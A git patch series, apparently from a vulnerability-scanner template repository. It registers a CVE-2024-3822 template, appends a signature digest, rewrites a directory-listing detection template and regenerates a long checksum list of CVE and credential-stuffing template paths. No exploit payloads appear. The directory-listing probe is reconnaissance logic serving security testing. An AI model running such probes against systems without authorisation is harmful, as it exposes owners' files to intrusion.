workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 93ce240b4df00a8891926f63b9e800aeb381d381 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 1 Jun 2024 06:25:23 +0000 Subject: [PATCH 1637/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3ba1725dc3..ba624c0b34 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-34470.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' + - 'http/cves/2024/CVE-2024-3822.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From cbc2220fd6fc47eb9f7d771f981a5943bcb25091 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 1 Jun 2024 06:26:31 +0000 Subject: [PATCH 1638/1768] Auto Template Signing [Sat Jun 1 06:26:31 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3822.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index e70a26f13c..701c9b23f8 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -35,3 +35,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "

")' condition: and +# digest: 490a004630440220167f065e360fd80541c2b69728e0f3749a99e3b73a6823ec510fa37bda6fbf1002205c5394d8306ae3f4e96c5bc535563f00e5bee5776948d717b013aa594ec46219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a6d4f5de35b8926c46a2e3c90fdf1c264ef16140 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 1 Jun 2024 10:29:33 +0400 Subject: [PATCH 1639/1768] Update directory-listing.yaml --- http/miscellaneous/directory-listing.yaml | 47 ++++++++++++++--------- 1 file changed, 28 insertions(+), 19 deletions(-) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index b183a7f32e..9e73bb7eaa 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -5,10 +5,14 @@ info: author: theMiddle severity: low description: Directory Indexing is a web server feature that allows the contents of a directory to be displayed when no index file is present. This can be a security risk as it can expose sensitive files, old backup or unreferenced files. + impact: | + Sensitive files and directories may be exposed to unauthorized users. + remediation: | + Disable directory listing in the web server configuration. reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information - https://portswigger.net/kb/issues/00600100_directory-listing - tags: miscellaneous,misc,generic,misconfguration,web + tags: misc,generic,misconfig,fuzz flow: | function target_is_in_scope(url) { @@ -52,16 +56,17 @@ http: - method: GET path: - "{{BaseURL}}" - redirects: true + + host-redirects: true + max-redirects: 2 matchers: - - type: status + - type: dsl internal: true - status: - - 200 - - type: word - words: - - "text/html" - part: header + dsl: + - contains(header, "text/html") + - status_code_1 == 200 + condition: and + extractors: - type: xpath name: links @@ -73,18 +78,22 @@ http: - method: GET path: - "{{BaseURL}}{{path_to_check}}" - redirects: true + + host-redirects: true + max-redirects: 2 + matchers-condition: and matchers: - - type: status - internal: true - status: - - 200 - - type: word - words: - - "text/html" - part: header - type: word + part: body words: - "Index of" - part: body + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 2192e614254da658dc5baf3c0eed91e44e594bf0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 06:51:14 +0000 Subject: [PATCH 1641/1768] Auto Generated Templates Checksum [Sat Jun 1 06:51:14 UTC 2024] :robot: --- templates-checksum.txt | 3632 ++++++++++++++++++++-------------------- 1 file changed, 1816 insertions(+), 1816 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92f757c619..5245076309 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -894,2426 +894,2426 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:ce532c48b5e65624cefb884818 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df8f32dc3625dd9ae3f8e98055a47dfeedd http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 -http/cves/2000/CVE-2000-0114.yaml:a16407d5ff25ba4e4b20bf569c4b2b72fb9314f6 -http/cves/2001/CVE-2001-0537.yaml:dfc71590b21157df096e56a911d803c4dfc5d487 -http/cves/2002/CVE-2002-1131.yaml:8c472964e890b65914d51945956af08d157683c5 +http/cves/2000/CVE-2000-0114.yaml:cde077e4cc4205ac3e06b13137f1882f457a3231 +http/cves/2001/CVE-2001-0537.yaml:fbfbd1e2d066d791fe2a6676ff00e50e85265fbc +http/cves/2002/CVE-2002-1131.yaml:a3c7f79b103646e11a8da3cf2a22094452e459a3 http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed -http/cves/2004/CVE-2004-1965.yaml:e28b61ebb6599f30be2cc81181374b86633ae203 +http/cves/2004/CVE-2004-1965.yaml:5da4f328bccbc13de52a9cda87bb775aaea45595 http/cves/2005/CVE-2005-2428.yaml:014d3a09f56e144c520b80336166df118252095d -http/cves/2005/CVE-2005-3344.yaml:0f6ed032ee2a10d879467dd1b98913641410916a -http/cves/2005/CVE-2005-3634.yaml:0cbf160e58df8839a73f7b898045f317c64b4862 +http/cves/2005/CVE-2005-3344.yaml:fb49ecd39f4b35179e4c70e42dbfe1fe66621b78 +http/cves/2005/CVE-2005-3634.yaml:fb7899762957cac6b841ca1ab13e38e8607989d8 http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:eafb416900150498d39f3f164834f1e5c93744c4 -http/cves/2007/CVE-2007-0885.yaml:98a6ef21fd877f8cbd47bce3516e4d4725956d40 -http/cves/2007/CVE-2007-3010.yaml:8c3c0a7dac1a3ee6d58c166036a86216ebd9fac5 -http/cves/2007/CVE-2007-4504.yaml:109b16a1bc2cac31ca2cda31fc6cc422fb6081ff -http/cves/2007/CVE-2007-4556.yaml:ad45fad1fff716c2675235c2bb0e6dec6c60b514 -http/cves/2007/CVE-2007-5728.yaml:62d4c87bc30c3d3dc66d0a2cd41b92df49037c62 +http/cves/2006/CVE-2006-2842.yaml:79af29153d57a8ab320e48e514308b5969d50793 +http/cves/2007/CVE-2007-0885.yaml:efbc944aa9eb01d384f65a4006bafb08434a249f +http/cves/2007/CVE-2007-3010.yaml:c5b1830593514312a48ab6f5b6bd184fda184644 +http/cves/2007/CVE-2007-4504.yaml:709bbb828ede5998c8222d8f5f25bfec65de3629 +http/cves/2007/CVE-2007-4556.yaml:47f15309aea6f64a71100bdcac276fd7b60a5a1c +http/cves/2007/CVE-2007-5728.yaml:694fbdd17183242f9d3bc3ef45c6d912d363fe32 http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:1fd11cadc3d59c7dbbe486aeeccf88afaf4806fa -http/cves/2008/CVE-2008-1547.yaml:7150f0c9df4626d0535ad3f1bd01076a61e634aa +http/cves/2008/CVE-2008-1061.yaml:cc5934daa30075510da0ff11325518ae3f17f298 +http/cves/2008/CVE-2008-1547.yaml:dc4f20c357b0117d721a81265352ba6fda6261d1 http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 -http/cves/2008/CVE-2008-2650.yaml:ea64d55814ac2da9fc731aeaebf2e7655bfe23df +http/cves/2008/CVE-2008-2650.yaml:d53dd7bfee4c739dda510e5ee2eb613dc697cba3 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c -http/cves/2008/CVE-2008-4764.yaml:de6e2d6abde105eca9553b1b82210a4a27d4a44f -http/cves/2008/CVE-2008-5587.yaml:eaa2391bce50e8ac9e393ab7c6f25f0eca432fa0 -http/cves/2008/CVE-2008-6080.yaml:268dd3e60e61080822e98998ee82395cc755b315 -http/cves/2008/CVE-2008-6172.yaml:5c414092d2b10360892211cb195e7b28041a9acf -http/cves/2008/CVE-2008-6222.yaml:3ae77fbf574af2a10e650dbdd9b4136f5a23b549 -http/cves/2008/CVE-2008-6465.yaml:4ff63a0f9d41e0045d4d044e676d53e110824089 -http/cves/2008/CVE-2008-6668.yaml:b75c190a75a7b5bf7b8e6ddc57b720f80b90e458 +http/cves/2008/CVE-2008-4764.yaml:63ba6b935c0bc87ae3438339221d4abf72d7a40f +http/cves/2008/CVE-2008-5587.yaml:c969a2f642a97ab738fb778c8cb11abf2f2d35be +http/cves/2008/CVE-2008-6080.yaml:34bc601e2cae9ecfc1d3f364787e95cc3025847b +http/cves/2008/CVE-2008-6172.yaml:c4f0f39106b0ec3b7ee708f17269d7b119486ea4 +http/cves/2008/CVE-2008-6222.yaml:48c6332172c9f3e7108ae6845e1c7a62d702281e +http/cves/2008/CVE-2008-6465.yaml:f2b2f886234800bb98db1ab9c3838867de620f3f +http/cves/2008/CVE-2008-6668.yaml:5db9e940887500dacc04bd5d9e64b078cf83e2fc http/cves/2008/CVE-2008-6982.yaml:ec7e061e851cd73e256f6cc2b73658bf631d9bc2 -http/cves/2008/CVE-2008-7269.yaml:619bb5e5f049dd812933a2c7b890618786ea5083 +http/cves/2008/CVE-2008-7269.yaml:74a76cbd660b63a451ad28b5c6e499d603951fcd http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 -http/cves/2009/CVE-2009-0545.yaml:f918c65721ede03f075a54f7d5dfd57f8b61214e -http/cves/2009/CVE-2009-0932.yaml:fe6e4a1fdf707fe7a0e33bd3310b79a46243a507 -http/cves/2009/CVE-2009-1151.yaml:41322ed9227e7d24fbf5fa4d95928add8914b79f +http/cves/2009/CVE-2009-0545.yaml:b4854e41056f1f4f88bfdd1599ee38b8701fa0ac +http/cves/2009/CVE-2009-0932.yaml:cd229881a65cca2a507a2f19b7bd7040b7e6f3ac +http/cves/2009/CVE-2009-1151.yaml:fbb8a9780edd67f308652e8ca20f2e049753a369 http/cves/2009/CVE-2009-1496.yaml:3b7fd77b1a4aa689f73d36ecdb6b3e5fa5ad4367 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:6db7c6cb3c42e9b3fe63827c37a1fa7f20ca15bc +http/cves/2009/CVE-2009-1872.yaml:394ba582c49eeda94980cd622fa95b3c7beefad3 http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 -http/cves/2009/CVE-2009-2100.yaml:45f55b4220a293129398ebaacec8345254b6e9ec +http/cves/2009/CVE-2009-2100.yaml:b1fed3abb29407f88d6faee5eba8919065b58874 http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 -http/cves/2009/CVE-2009-3318.yaml:650f806f026a5876bb83df1d3fa76d375e8033bd -http/cves/2009/CVE-2009-4202.yaml:fa1b0e24f4e056b30fb316e0fced751c87b413fd -http/cves/2009/CVE-2009-4223.yaml:1813fcf1434639a69894d696ca8562f5e5cea2a9 +http/cves/2009/CVE-2009-3318.yaml:974fd4cc88e3f89735bafc6002390f5951f84c75 +http/cves/2009/CVE-2009-4202.yaml:794900a596204e22965ff4ca20cb2c5281288aac +http/cves/2009/CVE-2009-4223.yaml:a8a1c50ee7caece6f3a124b4f9fcbcbfca624f3d http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 -http/cves/2009/CVE-2009-5020.yaml:96845c1d22cf83253333774c07e1be2416e91aa9 +http/cves/2009/CVE-2009-5020.yaml:85051897dc73a81c97e10972db632f719a4918ee http/cves/2009/CVE-2009-5114.yaml:eed033fbf16521f4aba9fe6fddbef642c202a00b -http/cves/2010/CVE-2010-0157.yaml:de5dd65be12fda192cfc3377c1db88cba1a8769c -http/cves/2010/CVE-2010-0219.yaml:ab25bf6c964e3fb73a7baf0124ce1de5e713fc85 -http/cves/2010/CVE-2010-0467.yaml:9b0c2b93a75e379ea975ccfea25ba2135f158c10 +http/cves/2010/CVE-2010-0157.yaml:ddef4fd4d27ec89abf52e89afd1238ebd8a9e8ac +http/cves/2010/CVE-2010-0219.yaml:97add297545c388a3f87790ff2daeaba38a84d08 +http/cves/2010/CVE-2010-0467.yaml:cbfe420f6148c4e7ec69d81ef7f9dccdaa2b8fd4 http/cves/2010/CVE-2010-0696.yaml:73259ec73f220808622802ae226874d03de4a439 -http/cves/2010/CVE-2010-0759.yaml:fc6b9f9554e34a7f856201b8e6b771e0644c2df0 -http/cves/2010/CVE-2010-0942.yaml:c03ababc0fb50eb537af53ddd9c3ce36d24d8985 +http/cves/2010/CVE-2010-0759.yaml:d4efd62acda03f88acdff771a23e105c57da5620 +http/cves/2010/CVE-2010-0942.yaml:c2153bdc250c5cd2ce90325ce50096ad8b6521e1 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 http/cves/2010/CVE-2010-0944.yaml:bfaf0faec2899ff4a64cb1a41b4229d73fbfd6a6 -http/cves/2010/CVE-2010-0972.yaml:c6ce2d613f49edaf02335b7128b23a718870094d +http/cves/2010/CVE-2010-0972.yaml:ddeb56e99bae15412ee93ee1cca6c3f43f2abba3 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 http/cves/2010/CVE-2010-0985.yaml:ea6f8ee446653031d0a1f2ee0295e337a7f115d8 http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 -http/cves/2010/CVE-2010-1081.yaml:248dcbecd5d3e14c19f788462fe63831548f8c75 +http/cves/2010/CVE-2010-1081.yaml:a9e63d0147ea276e4ef9b2fc035a96af99dac28f http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 http/cves/2010/CVE-2010-1219.yaml:f22b61d9fdc94d2e0611638f8adc881eee8481a9 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea -http/cves/2010/CVE-2010-1305.yaml:8e3fcbe24aa15170de7c85195637d213789a4d23 -http/cves/2010/CVE-2010-1306.yaml:1b5bd4af740cd2ea4d0f36300271a2ab28b24b1f -http/cves/2010/CVE-2010-1307.yaml:9d81d0f127ff48ea3c3f19d6e94bffdfed62e15c -http/cves/2010/CVE-2010-1308.yaml:9e9471063cbe144d48e9afbb99648a7838e318f2 -http/cves/2010/CVE-2010-1312.yaml:4144b0a0734f543ab60e3f8377e4eedb7a9dd3f6 -http/cves/2010/CVE-2010-1313.yaml:74d22dac4d378d3aa418463fd1b79a7285af52fc +http/cves/2010/CVE-2010-1305.yaml:2472be1c930d25b8ef09c04e9c0076ebdb6d3afe +http/cves/2010/CVE-2010-1306.yaml:302da19a1fa904a48cc109489628bcf1e3cb8721 +http/cves/2010/CVE-2010-1307.yaml:02c9440193acd85e94668ffbee5575c39f8483c7 +http/cves/2010/CVE-2010-1308.yaml:9f7f075061788b48cbf34a6bba23db64c2d2b45c +http/cves/2010/CVE-2010-1312.yaml:e060422c65a7d67a4e5bc1ea24c2a132fb2ffae6 +http/cves/2010/CVE-2010-1313.yaml:83220cba68d0bd8f0cb7400811a70ce5d08d70a2 http/cves/2010/CVE-2010-1314.yaml:e68e08b08120bd8612c9376f8b4a8f4562aa76ee http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 http/cves/2010/CVE-2010-1352.yaml:0f001c6956c9fc5d200417b838d6a39fc23e353d -http/cves/2010/CVE-2010-1353.yaml:a082865fe732fb2cb763550ce58012db6e174ce4 -http/cves/2010/CVE-2010-1354.yaml:3815e3efd12eab17741d0018c5df7da435d95590 -http/cves/2010/CVE-2010-1429.yaml:7721907b63b852008f530318ea7204e84dc9a576 -http/cves/2010/CVE-2010-1461.yaml:4e5e50242fec4d8fb4e64039a91462a9e4d95ed6 -http/cves/2010/CVE-2010-1469.yaml:17292f4c744874b7c575553ffc357f9c5c3c6e26 +http/cves/2010/CVE-2010-1353.yaml:3e4b4d4ed60e0e4cab2c21797d8ae9884540408d +http/cves/2010/CVE-2010-1354.yaml:a8e32d056c74334fc86f716aa7a50515618fdf94 +http/cves/2010/CVE-2010-1429.yaml:36032d4688e465e068d6acb3916cbe87d982d72d +http/cves/2010/CVE-2010-1461.yaml:66ff1d52ed49414279f38a9ef66e21397033c681 +http/cves/2010/CVE-2010-1469.yaml:c4496478b863beaf50ec065b2d7251449346eadd http/cves/2010/CVE-2010-1470.yaml:425cbc7cf9331292bc877c74171918b9b26233ed -http/cves/2010/CVE-2010-1471.yaml:57a7c5deaae55f0d62c258b62d311c38f5a9077b +http/cves/2010/CVE-2010-1471.yaml:5933d9fc11464aff303d9e3a6026416f3e893e9e http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 -http/cves/2010/CVE-2010-1473.yaml:66c189290d58a22b9c03499bccaffdd2c27be30c -http/cves/2010/CVE-2010-1474.yaml:8205d235b154fd23280ed3cde0a616a68f09e76e +http/cves/2010/CVE-2010-1473.yaml:e322a26eadc2fc402fb215602159fea2821345bb +http/cves/2010/CVE-2010-1474.yaml:d5770393c9bf13d7b60aec65acaab2417ad19e63 http/cves/2010/CVE-2010-1475.yaml:ba1533465a3c2032e7bbe8babc2aa2e33279217a -http/cves/2010/CVE-2010-1476.yaml:9da8b39c0197494de8a6b7540d82dbc24a3c7e9b +http/cves/2010/CVE-2010-1476.yaml:cb4315adfa0bde7ffd51d2a3e6de28bb6c11ec21 http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d -http/cves/2010/CVE-2010-1494.yaml:64792acd64a2aa81243bd437da329f4a6dc1eadd +http/cves/2010/CVE-2010-1494.yaml:28b3a504c10ea35e84a8e5ab55d46b96d1068ed2 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a http/cves/2010/CVE-2010-1531.yaml:37431ef4763a68b3568e8a486d81cf5e1643d80a -http/cves/2010/CVE-2010-1532.yaml:7b359d1801b34fad27c6ad13948879977d96098d -http/cves/2010/CVE-2010-1533.yaml:75edd02d0f324dcb1648a83455210233850ea9b3 -http/cves/2010/CVE-2010-1534.yaml:c3990a0a0c5872fcff919eabff42ad8613bd00c2 -http/cves/2010/CVE-2010-1535.yaml:8a0f96e71a76ed67044f3416796ea56a10b752c3 +http/cves/2010/CVE-2010-1532.yaml:438cdd173e4a31325ea27aea246aab2c4c34c14e +http/cves/2010/CVE-2010-1533.yaml:cbc6ad1e85e13bc8cb630ab2c364643d413fa0af +http/cves/2010/CVE-2010-1534.yaml:03dbcea8eaffe21f469180d5993ee5afbdbacfa7 +http/cves/2010/CVE-2010-1535.yaml:80d65e19fc2ed303d5cc8adb820232f44893202b http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b http/cves/2010/CVE-2010-1601.yaml:b4aafeb36e3e33aeb3edd3b955b4953db25705ea -http/cves/2010/CVE-2010-1602.yaml:234f0b08d3f9e18b36ae71130989ee706fe93c86 +http/cves/2010/CVE-2010-1602.yaml:cca603ccbfdc146605d757fabdf6a1aa6e37cfed http/cves/2010/CVE-2010-1603.yaml:b6188b9d88e5d2351979796ebb3270d3fde53be9 -http/cves/2010/CVE-2010-1607.yaml:a6f048c12f817242d34af200f8aa3725995e4009 -http/cves/2010/CVE-2010-1653.yaml:5b03c1d17662a42748f48390006affe1c54a85c8 -http/cves/2010/CVE-2010-1657.yaml:6bc17590c2f06b9f939def217dac747f3566f852 +http/cves/2010/CVE-2010-1607.yaml:220efc2f1c0b9f145d04ec1cc0efc479157838d7 +http/cves/2010/CVE-2010-1653.yaml:6750c406d14955dd9e2c8feeb78178f3f0076547 +http/cves/2010/CVE-2010-1657.yaml:73d665d3d27f4bf152014ec82f56028e16f16abf http/cves/2010/CVE-2010-1658.yaml:7822fc55851a3db8a17932d981cd1249270a1fcd -http/cves/2010/CVE-2010-1659.yaml:8b9aa1882b3086f27d6ecfe9ca81568a2544c287 +http/cves/2010/CVE-2010-1659.yaml:f6b62072548aa907fa67787167cbb82d9d763324 http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce -http/cves/2010/CVE-2010-1715.yaml:4d975c9a6c4c5806bee7616932b4c0dc190211bb +http/cves/2010/CVE-2010-1715.yaml:daed63a42610d953dad924ab3139fcc62044d756 http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 -http/cves/2010/CVE-2010-1718.yaml:ffce1b902c947a357f4fe9c7f3bd2d364ed3df3b +http/cves/2010/CVE-2010-1718.yaml:aa32181a904283d0e32744973e5b8be429273193 http/cves/2010/CVE-2010-1719.yaml:81f15e4304779eb24cba200b01099889e5140a74 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 -http/cves/2010/CVE-2010-1723.yaml:c2378ea53b5434391f1a786f333ca9b185b34780 +http/cves/2010/CVE-2010-1723.yaml:45f2313b13af972e214edd03a86ef58149328b1a http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:77e6d281e9eb5cf1d6305ee6c033acd2da1e553f +http/cves/2010/CVE-2010-1870.yaml:321316a994f71a408dc53de7fbc83f07b47c3714 http/cves/2010/CVE-2010-1875.yaml:153037344f618b22315b5cb6c764f56e6020e115 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 -http/cves/2010/CVE-2010-1952.yaml:a788fb53eac46d8bad34af96542981bb72a1a4f0 -http/cves/2010/CVE-2010-1953.yaml:96afcdb36a574204721283a261502982c7e75bd0 +http/cves/2010/CVE-2010-1952.yaml:4e23bfee74560418ea78ed1fa6bbd3d164d86e14 +http/cves/2010/CVE-2010-1953.yaml:92593bf4c6168db596ce32760588f97b76add554 http/cves/2010/CVE-2010-1954.yaml:7935cf23b4feb5d1cd7668642ff36fa87c41a759 -http/cves/2010/CVE-2010-1955.yaml:05f2076ebe2e4f8faa1d8c190f98bc27de31f64f -http/cves/2010/CVE-2010-1956.yaml:ee14e3a8c2698899dfda1080857625acbf6862b4 -http/cves/2010/CVE-2010-1957.yaml:ca5a15b18aee163794525357489a0cb944e233a8 -http/cves/2010/CVE-2010-1977.yaml:77d3ebab90390df136d8474a5e6ecbbf54b6e5db +http/cves/2010/CVE-2010-1955.yaml:cee09885c3fe1dea578218c5b63469f2fd3cd905 +http/cves/2010/CVE-2010-1956.yaml:9cae094ac7f90ea7c74afd1ac7f6ca72cb26ad44 +http/cves/2010/CVE-2010-1957.yaml:f3d0975a0cd41bcbdc55fc95cad0f3a92a7b05c6 +http/cves/2010/CVE-2010-1977.yaml:323af1f37f4bafc02c35680b3b5f25c65dc1012e http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c http/cves/2010/CVE-2010-1981.yaml:b1c467846895e76100a2ce986bbd364c7ef11875 -http/cves/2010/CVE-2010-1982.yaml:387182b3a10dff830c6bd1995fdeb5154f2404e0 +http/cves/2010/CVE-2010-1982.yaml:ba5aa35d9543a73569b8db46278243d8b818463b http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 http/cves/2010/CVE-2010-2035.yaml:343a15271ba30a258277c2d62a2ac0b32eae4a7a -http/cves/2010/CVE-2010-2036.yaml:61bf5931b710a0ccc0d1d8bb878f73a096f0482c -http/cves/2010/CVE-2010-2037.yaml:4c6d577dc6e0754cfed93cd62cc00cd0353307e7 +http/cves/2010/CVE-2010-2036.yaml:987ff41eb17287615f545e61109562af0e4e11ac +http/cves/2010/CVE-2010-2037.yaml:9cb8477ccf1880daf9122b815722304234537b39 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 -http/cves/2010/CVE-2010-2050.yaml:6ce407f0e35ff5ec6b553a23263175b01f9fdfe0 +http/cves/2010/CVE-2010-2050.yaml:0769276e076f4cfd3fa7d1a3ff7ceaa339828ca6 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 http/cves/2010/CVE-2010-2128.yaml:7e08cbdba6e319549864dcd168316626d1fec1a5 http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f http/cves/2010/CVE-2010-2307.yaml:974a029d715d0b35c48ae0152129a4eb67bc72c5 -http/cves/2010/CVE-2010-2507.yaml:c85d135f7474bc57e60169d52f3355708dd4600e -http/cves/2010/CVE-2010-2680.yaml:b157df1fb12dfad3450ae14b5c8092466e5817bb +http/cves/2010/CVE-2010-2507.yaml:374cf4047e37632490fbdfc825fce2eb1b5c7e58 +http/cves/2010/CVE-2010-2680.yaml:8a3e803dff818279452703ce45b1ceb5b0d7a328 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 http/cves/2010/CVE-2010-2857.yaml:2e5ec92cf7a36d86f01ff057ec26939b1877a8d5 -http/cves/2010/CVE-2010-2861.yaml:f65f66c238e655bf561b998f84c651fc8164d124 -http/cves/2010/CVE-2010-2918.yaml:7fcaac6f3a9baca1ecb1b8cb70cf1abfd8a27440 +http/cves/2010/CVE-2010-2861.yaml:649c467d63ee9eeb2a84cd5c4be98baf86ccaf27 +http/cves/2010/CVE-2010-2918.yaml:0d785499476f3aba502f9a5d40039f9d38d01330 http/cves/2010/CVE-2010-2920.yaml:f32fc44594b039fd382f339f9ac42d0d9858a60b -http/cves/2010/CVE-2010-3203.yaml:d5d08e415f5daeb29e2650d9a57c3c29922e4b8a +http/cves/2010/CVE-2010-3203.yaml:e9aafd881e5ed1c311f7960188aaade5eff50e12 http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a -http/cves/2010/CVE-2010-4231.yaml:c58a93471fd959552d49733b23c921347365d958 -http/cves/2010/CVE-2010-4239.yaml:d2cfcdbb7375c86d15942a8eeb9a75d021de6151 -http/cves/2010/CVE-2010-4282.yaml:6cb02784d063779c1a36562e21574e0e72c51b90 +http/cves/2010/CVE-2010-4231.yaml:51bdd2463b062dd515ebd1cd667897d559732db7 +http/cves/2010/CVE-2010-4239.yaml:c4050ca6a9a1ba60621e66783f85213759b64d96 +http/cves/2010/CVE-2010-4282.yaml:a6a60700c9e220d86947b9b5bf65cedc3839e03a http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 http/cves/2010/CVE-2010-4719.yaml:6c0dc775334d3f436a198b83d84a98acf172da6a http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 -http/cves/2010/CVE-2010-4977.yaml:99e4d5e11603cfb88ec21eb96babf8b35e51531d -http/cves/2010/CVE-2010-5028.yaml:c99b46a20d28f765e23fe32dd3cf9084abd7a167 -http/cves/2010/CVE-2010-5278.yaml:a2469407db620267c9d502b9eb3f986ba4c6cec7 -http/cves/2010/CVE-2010-5286.yaml:4ab8a558033c667ae000d9e86c970511daf6ad9e -http/cves/2011/CVE-2011-0049.yaml:04cb75dee17a3973d8f1a37e5332a15560c93ebd +http/cves/2010/CVE-2010-4977.yaml:9e5b7253a99c393814e0f3cfbd27992dfa336274 +http/cves/2010/CVE-2010-5028.yaml:0ffbc4395e4046ada43652a0e0fa672cdad14a7c +http/cves/2010/CVE-2010-5278.yaml:8a60614e73e0cf3b1ffbb76269b13b7921535de6 +http/cves/2010/CVE-2010-5286.yaml:ccf9698bf9602866e9d6b800f766c5a9c893ebb9 +http/cves/2011/CVE-2011-0049.yaml:a13d91484a5b80a35520ea575a0c4032deb34b57 http/cves/2011/CVE-2011-1669.yaml:b790ebc1bb9519722ffd34b342f8d4eca798ecb2 -http/cves/2011/CVE-2011-2744.yaml:c6cd48497ee1ba7c577026b4fa4d43538ad44f7f 